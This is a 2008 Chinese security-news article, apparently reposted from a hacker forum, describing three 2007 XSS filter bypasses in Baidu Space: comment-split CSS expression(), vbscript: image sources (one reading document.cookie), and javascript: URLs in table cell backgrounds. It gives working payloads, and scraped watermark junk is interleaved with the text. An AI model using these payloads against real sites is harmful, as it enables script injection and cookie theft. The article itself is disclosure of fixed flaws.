科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道百度空间07年三个跨站漏洞

百度空间07年三个跨站漏洞

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

百度虽然对于插入的html标签的属性进行过滤,包括style(层叠样式表),但是并没有对混淆在样式中的注释部分进行位置检查。造成可以通过在expression中插入注释,譬如:expr/*XSS*/ession,并以此方式绕过百度的过滤系统。

作者:zdnet安全频道 来源:论坛整理 2008年9月18日

关键字: 漏洞 百度空间

  • 评论
  • 分享微博
  • 分享邮件

一、
 A,l
*d7Y7_.E#M:h2l
      漏洞成因:百度虽然对于插入的html标签的属性进行过滤,包括style(层叠样式表),但是并没有对混淆在样式中的注释部分进行位置检查。造成可以通过在expression中插入注释,譬如:expr/*XSS*/ession,并以此方式绕过百度的过滤系统。但是由于在IE运行时会忽略掉注释内容,使得XSS代码得以正常运行,跨站即产生
      示例:

CODE:
<img STYLE="xss:expr/*XSS*/ession(alert(&quot;XSS&quot;))">
<div STYLE="xss:expr/*XSS*/ession(this.innerHTML=&quot;<h1> monyer</h1>&quot;)"></div>
i
中国青年黑客联盟[CYHU]----[开放注册中]:r0},J1p(S3z-Q
(_2?2o"o9v5`
      漏洞成因:虽然百度空间费劲心思过滤了javascript,过滤了expression,过滤了等等的一些触发事件。可是它忽略了过滤vbscript,因此造成了一个非常严重的跨站漏洞的出现
    示例:

CODE:
<img src="vbscript:msgbox(&quot;xss&quot;)" />
<img src="vbscript:msgbox(document.cookie)" />

6_/R0w#q9E三、
'_,k*H'W4o4~/t:V3l&Z4a"s
www.hack.org.cn-I2}1\(q,L%b
      漏洞成因:我们知道对于backgroud样式属性是需要嵌套url才能引用XSS代码的,如果直接把代码写进backgroud是不能运行的,因为缺少了一个触发机制。而table标签会自动加载内部内容——相当与eval。(如果你上一个比较慢的空间,并且整个空间只有一个table,那么你会发现直到整个table数据全部下载到本地才能显示网页内容,原因即是如此)
 示例:
 
CODE:
<table><tr><td background="javascript:alert(/xss/)"></tr></table>

<table >
<tr >
<td background="javascript:TheId.innerHTML=%22<embed src=\'URL\' height width >%22" >sth or noting</td >
</tr >
</table >

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章